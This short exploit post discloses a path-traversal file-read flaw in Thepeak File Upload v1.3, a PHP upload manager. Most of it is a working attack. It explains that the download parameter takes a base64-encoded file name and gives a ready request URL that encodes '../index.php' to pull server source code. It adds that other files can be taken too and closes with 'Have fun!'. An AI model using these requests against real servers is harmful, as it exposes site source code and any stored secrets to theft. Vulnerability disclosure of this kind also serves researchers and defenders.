Thepeak File Upload v1.3 : Read file vulneability

Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com

Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,…) from server.

Exploit :
http://somesite.com/example/index.php –> upload form
Now, we upload one file to server, ex : test.jpg –>ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : …/index.php –> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!